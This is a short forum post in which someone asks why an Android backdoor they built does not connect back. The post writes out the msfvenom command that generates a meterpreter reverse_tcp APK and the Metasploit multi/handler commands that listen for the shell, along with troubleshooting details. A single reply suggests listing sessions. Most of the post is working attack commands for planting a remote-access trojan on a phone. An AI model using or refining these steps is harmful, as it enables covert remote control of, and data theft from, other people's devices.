I'm trying to install a backdoor in my Adroid phone with no results.
I describe you the operation:
1) I generate the payload with
msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=port R > /root/reversetcp.apk
2) I open msfconsole and lauch these commands:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST ip
set LPORT port
exploit
OUTPUT:
* Starting reversing handler on the ip:port
3) I install apk on the phone with no problems
I TAP ON THE MAIN ACTIVITY ICON BUT NOTHING HAPPEN
4) PROBLEM!!!!
ON THE PHONE: The app doesn't open, but no errors display
ON COMPUTER: No output on msfconsole!!
NO Starting the payload handler.. NO
No session created.
IMPORTANT NOTES
1- The phone and the computer are on the same network
2- I enable the phone to install unsigned, third-party apps
3- The port is 4444(when i launch exploit the port will open)
4- No firewall no antivirus on the phone
5- The phone is not rooted
6- No errors are generated during 1,2,3 phases.
7- Android version 6.0
8- I have also tried using tablet with the same result ):
9- I have update the system, the tools but nothing
1 Response
try sessions -l
Share Your Thoughts